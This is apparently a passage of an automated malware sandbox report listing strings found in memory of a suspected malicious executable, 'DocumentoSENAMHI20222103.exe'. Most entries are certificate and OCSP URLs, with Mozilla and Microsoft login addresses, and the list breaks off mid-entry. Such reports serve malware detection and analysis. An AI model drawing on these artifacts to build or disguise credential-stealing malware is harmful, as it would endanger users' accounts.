                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
                      Source: wtqsCpda..exe, 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83503822976.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83518448531.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83518448531.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83518448531.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, 